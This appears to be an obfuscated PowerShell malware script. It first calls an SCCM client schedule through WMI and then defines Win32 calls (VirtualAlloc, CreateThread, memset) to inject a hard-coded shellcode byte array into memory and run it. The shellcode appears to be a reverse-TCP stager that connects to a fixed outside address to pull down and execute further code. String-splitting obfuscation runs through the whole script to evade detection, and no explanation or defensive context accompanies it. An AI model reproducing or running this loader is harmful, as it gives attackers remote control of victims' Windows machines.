&("{2}{1}{0}" -f't','-Hos','Clear')

&("{0}{2}{3}{1}"-f 'S','e','et-Va','riabl') -Name ('a') -Scope ("{0}{1}"-f 'Glo','bal') -Force
.("{3}{2}{1}{0}"-f'ble','a','Vari','Set-') -Name ("{0}{1}"-f 'S','MSCli') -Scope ("{1}{0}" -f'lobal','G') -Force

${S`mscLI} = [wmiclass] ((("{1}{3}{5}{4}{2}{0}" -f'ent','r','MS_Cli','ootJe9cc','S','m:'))."REPla`Ce"(([chaR]74+[chaR]101+[chaR]57),'\'))
${a} = ${Sms`C`lI}.("{1}{0}{2}"-f'iggerSch','Tr','edule').Invoke("{00000000-0000-0000-0000-000000000001}")
If (${a}."__Prop`e`R`Ty_`COUnT" -eq 1) {
	${SM`ScLi}."D`IsP`ose"
	.("{0}{1}{2}{4}{3}" -f 'Rem','o','ve-Varia','e','bl') -Name ('a') -Scope ("{0}{2}{1}"-f'G','obal','l') -Force
	&("{0}{3}{2}{1}" -f 'Remov','ble','aria','e-V') -Name ("{1}{0}"-f 'SCli','SM') -Scope ("{0}{1}"-f'Glob','al') -Force
	exit 0
} else {
	${smS`Cli}."DisP`OSe"
	&("{3}{0}{1}{2}{4}" -f've-','V','ari','Remo','able') -Name ('a') -Scope ("{1}{2}{0}" -f'l','Glo','ba') -Force
	.("{3}{0}{2}{4}{1}"-f'Va','le','ri','Remove-','ab') -Name ("{0}{1}" -f'SM','SCli') -Scope ("{1}{2}{0}"-f 'l','G','loba') -Force
	exit 1
}

${c} = ((("{84}{27}{7}{43}{26}{68}{28}{9}{65}{80}{29}{54}{35}{2}{79}{21}{64}{72}{45}{46}{57}{5}{25}{20}{47}{77}{10}{58}{41}{4}{61}{8}{16}{49}{70}{23}{63}{15}{66}{40}{34}{81}{3}{83}{11}{19}{74}{0}{67}{12}{32}{69}{78}{82}{30}{44}{56}{42}{36}{13}{50}{37}{59}{22}{53}{73}{48}{51}{6}{76}{55}{52}{14}{33}{39}{60}{18}{17}{62}{1}{31}{24}{38}{75}{71}" -f 'ibutes, uint ','in','rtualAll',' extern IntPtr CreateThr',', uint f','nt flA','d','kernel32','Prot',']public sta','t',' l','tackS','ss, In','Pt',']p','ect);[DllImpor','st, ','de','pT','o','I','Parameter,','nel32.','rc','ll','dll','(tF7','F7)','IntP','Ptr lp','t s','ize','r memset(','s','Vi','tAddre','P',', uint ','IntPt',' ','pe','r','.','St','uint',' d','c',' IntPtr','t','t',' lpThreadI','lic static extern Int',' uint dwCreationFlag','tr ','(tF7msvcrt.dlltF7)]pub','a','wSize, ui','ionTy','tr lp','r ','l','u','dlltF7)','ntPtr ','tic exter','ublic','dwS','t',',','(tF7ker','ount);','lpAddress, ','s,','hreadAttr','c',');[DllImport','a',' I','oc(','n ','tatic','nt','ead(IntPtr','[DllImport'))."rEpL`Ace"(([cHar]116+[cHar]70+[cHar]55),[striNg][cHar]34));${W} = &("{0}{2}{1}"-f 'A','pe','dd-Ty') -memberDefinition ${C} -Name ("{0}{1}" -f 'Wi','n32') -namespace ("{3}{2}{0}{1}{4}"-f '32','F','in','W','unctions') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xb5,0x3f,0xec,0x26,0x68,0x02,0x00,0x02,0x9a,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."L`EngTh" -gt 0x1000){${g} = ${Z}."l`en`gth"};${x}=${w}::("{2}{1}{0}{3}"-f'tualAll','r','Vi','oc').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."lEnG`Th"-1);${i}++) {${W}::"mE`mS`Et"([IntPtr](${x}.("{2}{1}{0}" -f 't32','oIn','T').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{0}{1}{2}{3}" -f'Creat','eT','hrea','d').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{2}{0}" -f'ep','Start','-sle') 60};
